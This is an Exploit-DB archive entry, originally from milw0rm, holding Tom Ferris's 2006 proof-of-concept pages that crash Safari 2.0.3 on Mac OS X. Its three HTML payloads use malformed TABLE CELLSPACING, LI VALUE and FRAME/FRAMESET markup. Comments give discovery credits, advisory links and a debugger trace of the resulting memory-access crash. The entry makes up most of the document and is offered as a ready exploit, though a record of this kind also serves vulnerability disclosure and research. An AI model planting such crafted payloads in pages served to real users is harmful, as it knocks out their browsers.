Apple Mac OS X Safari <= 2.0.3 417.9.2 Multiple Vulnerabilities PoC

2006-04-24T00:00:00
ID EDB-ID:1712
Type exploitdb
Reporter Tom Ferris
Modified 2006-04-24T00:00:00

Description

Apple Mac OS X Safari <= 2.0.3 (417.9.2) Multiple Vulnerabilities PoC. Dos exploit for osx platform

                                        
                                            &lt;!--- 
    Safari 2.0.3 (417.9.2) CELLSPACING Issue..
    
    Discovered by:
    Tom Ferris
    &lt;tommy[at]security-protocols[dot]com&gt;
    
    Tested on:
    Mac OS X 10.4.5 using Safari
    
    03/16/2006 Security-Protocols.com
    
    Advisory:
    http://www.security-protocols.com/advisory/sp-xxx
    
    This program is free software; you can redistribute it and/or modify it under 
    the terms of the GNU General Public License version 2, 1991 as published by
    the Free Software Foundation.
!--&gt;

&lt;TABLE COLSPEC=http:SECURITY-PROTOCOLS CELLSPACING=7432679423&gt;
&lt;OBJECT DATA=YIKES&gt;

&lt;!--- 
    Safari 2.0.3 (417.9.2) DoS
    
    Discovered by:
    Tom Ferris
    &lt;tommy[at]security-protocols[dot]com&gt;
    
    Tested on:
    Mac OS X 10.4.3 using Safari
    
    01/05/2006 Security-Protocols.com
    
    Starting program: /Applications/Safari.app/Contents/MacOS/Safari 
    Safari(320,0xa000ed68) malloc: *** vm_allocate(size=759734272) failed (error code=3)
    Safari(320,0xa000ed68) malloc: *** error: can't allocate region 
    Safari(320,0xa000ed68) malloc: *** set a breakpoint in szone_error to debug

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
    0x959cbc98 in -[WebTextRenderer(WebInternal) _CG_drawRun:style:geometry:] ()
    
    This program is free software; you can redistribute it and/or modify it under 
    the terms of the GNU General Public License version 2, 1991 as published by
    the Free Software Foundation.
!--&gt;
	
&lt;LI VALUE=1234567890 TYPE=A&gt;

&lt;!--- 
    Safari 2.0.3 (417.9.2) DoS
    
    Discovered by:
    Tom Ferris
    &lt;tommy[at]security-protocols[dot]com&gt;
    
    Tested on:
    Mac OS X 10.4.5 using Safari
    
    01/05/2006 Security-Protocols.com
    
    Advisory:
    http://www.security-protocols.com/advisory/sp-x24-advisory.php
    
    This program is free software; you can redistribute it and/or modify it under 
    the terms of the GNU General Public License version 2, 1991 as published by
    the Free Software Foundation.
!--&gt;

&lt;TABLE&gt;
&lt;FRAME SCROLLING= NAME=TOMFERRIS SRC= SCROLLING=&gt;
&lt;FRAMESET&gt;

# milw0rm.com [2006-04-24]